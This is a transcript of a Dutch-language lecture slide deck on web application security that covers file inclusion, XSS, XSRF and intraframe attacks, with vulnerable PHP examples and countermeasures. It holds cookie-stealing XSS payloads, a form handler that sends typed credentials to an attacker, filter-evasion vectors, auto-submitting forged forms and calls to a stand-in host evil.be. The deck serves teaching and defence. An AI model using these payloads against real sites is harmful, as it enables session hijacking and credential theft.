Webapplication Security

Transcriptie

1 Webapplication Security

2 Over mijzelf 7 jaar in websecurity Oprichter van VirtuaX security Cfr. Bugtraq Recente hacks hak5.org wina.ugent.be vtk.ugent.be...

3 Aantal vulnerable websites

4

5 Types vulnerable websites

6 Hoe komt dit? Veel amateur-coders Geen basis/idee van security Beveiligen = moeilijk Hacken = gemakelijk

7 Deel 1: File Inclusions

8 File Inclusions 1. Remote file inclusion Includen van externe bestanden Draaien shell! 2. Local file inclusion Includen van lokale bestanden Lekken van gevoelige gegevens Source code disclosure

9 Normale situatie SERVER FILE SCRIPT CLIENT

10 Remote File Inclusion SERVER FILE EVIL FILE SCRIPT HACKER

11 Onveilige script index.php?p=bleh.txt <?php... include($_get['p']);...?> Output: inhoud van bleh.txt

12 Voorbeeld Remote File Inclusion

13 Local File Inclusion SERVER FILE SENSITIVE FILE SCRIPT HACKER

14 Onveilige script index.php?p=bleh.txt <?php... include($_get['p']);...?> Output: inhoud van bleh.txt

15 Voorbeeld Local File Inclusion

16 Oplossing <?php switch($_get['p']) {?> } case bleh include('bleh.txt');... default: echo Are you hacking? :

17 Conclusie file inclusions php.ini configureren Input niet vertrouwen Input niet rechtstreeks in functie steken

18 Einde File Inclusion Vragen?

19 Denken zoals een hacker... Must own noob..

20 Typische authenticatie Admin PASWOORD COOKIE Server User lvl: NOBODY Admin COOKIE + DATA DATA Server User lvl: ADMIN

21 Hoe admin worden? Paswoord bemachtigen >> File inclusion << >> SQL injections << Paswoord veranderen >> XSRF << Cookie bemachtigen >> XSS <<

22 Deel 2: XSS

23 XSS Admin PASWOORD Server User lvl: NOBODY Admin + DATA DATA Server User lvl: ADMIN

24 XSS Cross Site Scripting Cookie setting Admin bezoekt Admin krijgt Cookie stealing Admin bezoekt <script> gestolen Session riding Hacker gebruikt

25 Hoe exploiten? (3) Admin PASWOORD User lvl: NOBODY Admin + DATA DATA <script> User lvl: ADMIN Hacker + DATA DATA Server User lvl: ADMIN

26 Onveilige script index.php?cat=immo <?php... echo Categorie.$_GET['cat'];...?> Output: Categorie: Immo

27 Hoe exploiten? Input Vector zoeken vb: index.php?cat= <script> document.location= +document.cookie; </script> Output: Categorie:<script>... </script>

28 Hoe exploiten? (2) Input Vector als ' disabled (PHP5): <script> document.location= String.fromCharCode(..,..,..)+ document.cookie; </script>

29 Voorbeeld XSS (1)

30 Countermeasures (1) <?php... $categorie = str_replace( <script>,,_get['cat']); echo Categorie:.$categorie;...?> NIET VEILIG

31 Voorbeeld XSS (2)

32 Countermeasures (2) <?php... $categorie =?> htmlentities($_get['cat']); echo Categorie:.$categorie;... VEILIG

33 Voorbeeld XSS (3)

34 <script> plaatsing Non persistent Niet opgeslagen (tijdelijk in URL) Zie vorige vb Persistent Script definitief op server zetten vb. Guestbook, Forum, Profiel... vb. boudewijn.ugent.be

35 All input is evil Niet altijd in tekst-variabelen Internet Explorer: bug van 1995 NOG niet opgelost Content-type wordt genegeerd IE bepaalt zelf content-type

36 IE Content-type exploit HTML/JavaScript-code uploaden Content-type aanpassen Bestand laden in IE PERSISTENT

37 Voorbeeld XSS (4)

38 Countermeasures (2) <?php... $file =...; $handle = finfo_open(fileinfo_mime); $mime_type = finfo_file($handle,$file); if($mime_type!= image/jpeg ) { exit( Hacking attempt detected. ); }...?> VEILIG

39 Verder mogelijkheden (1) Client geposte informatie laten doorsturen naar hacker <form action="login.php" method="post" onsubmit=" hackimg=new Image; hackimg.src=' +document.forms(1).login.value +':' +document.forms(1).password.value; "> </form>

40 Verder mogelijkheden (2) Client andere sites laten aanvallen /hello.php?name= <iframe src= > </iframe> = Ideale proxy voor hacker

41 Verdere mogelijkheden (3) Andere Input Vectors: <img src='javascript:alert();'> <img src='vbscript:msgbox();'> <SCRIPT SRC=locatie/xss.js /> <SCR\0IPT>alert("XSS")</SCR\0IPT> <TAG onload='javascript:alert();'> cfr:

42 Enkele limitaties Eenmalig, aanval móet lukken Sessions kunnen eindigen JavaScript/ActionScript enabled? Soms IE/... vereist

43 Conclusie vs XSS htmlentities() e.d. gebruiken Content/Mime-type controleren All input is evil!

44 Einde XSS Vragen?

45 Deel 3: XSRF

46 XSRF Cross Site Request Forgery Valt onder hotlinking attacks Cross-domain linken Gevaar herkent sinds begin '90 Fout komt in veel technologieën voor The hidden enemy Moeilijk te herkennen Moeilijk te beveiligen

47 XSRF Cross Site Request Forgery Zoeken naar vuln pagina UPDATE DB pagina Request Forgery Admin bezoekt onveilige script Paswoord/ verandert

48 Typische profielpagina Admin DATA + DATA Server User lvl: ADMIN UPDATE DATA DB

49 profiel.php <form action= bleh.php > <input type=text name=username/> <input type=text name=paswoord/> <input type=text name= /> </form>

50 Idee (1) <form action= > <input type=text name=username value=admin /> <input type=text name=paswoord value=hacked /> <input type=text name= value=blah/> </form> GEEN SESSION-ID

51 Idee (2) Admin naar onze pagina laten gaan Admin heeft immers session-id Form automatisch laten verzenden JavaScript form.submit();

52 Idee (2) code <form action= id= frm > <input...> <input...> </form> <script> document.getelementbyid( frm ).submit(); </script>

53 Voorbeeld XSRF

54 XSS + XSRF = krachtig Password managers Vullen automatisch paswoord in Als er XSS is, <script> insteken Doel: actie form veranderen Doel2: form verzenden

55 Voorbeeld-code login.php?cat= <script> var a = document.getelemenbyid( frm ); a.action= ; settimeout(a.submit(),500); </script> Output: Pagina verstuurd wachtwoord naar

56 Countermeasures vs XSRF Referer checken $_GET['referer'] Counter: XSS + XSRF vinden Oud paswoord vragen voor elke UPDATE

57 Einde XSRF Vragen?

58 Deel 4: Geavanceerdere technieken

59 IntraFrame attacks XSS is niet beperkt tot één pagina DOM-security model zegt: <script> mag enkel informatie op zelfde host lezen/aanpassen <script> heeft volledige controle over pagina's geladen in frames ZOLANG document.domain geldig is

60 IntraFrame attacks VICTIM BROWSER <script>... </script> <iframe src= evil.be/script.php... > <img src= evil.be/script.php... > SERVER HACKER <iframe> sensitive document op server VULNERABLE SERVER

61 IntraFrame attacks Combineren van aanvallen Meerdere submits() mogelijk vb: XSRF, veranderen Paswoord requesten Evil actie uitvoeren Reageren op gekregen informatie mogelijk via bvb. Ajax Mogelijk om logger te maken

62 IntraFrame sploiter VICTIM BROWSER <script>... </script> <iframe src= evil.be/script.php... > <img src= evil.be/script.php... > SERVER HACKER <iframe> sensitive document op server VULNERABLE SERVER

63 Voorbeeld IntraFrame attack (1)

64 IntraFrame logger VICTIM BROWSER <script>... </script> <iframe src= evil.be/script.php... > <img src= evil.be/script.php... > SERVER HACKER <iframe> modified document VULNERABLE SERVER

65 Voorbeeld IntraFrame attack (2)

66 Einde geavanceerde technieken Vragen?

67 Slot Verdere vragen?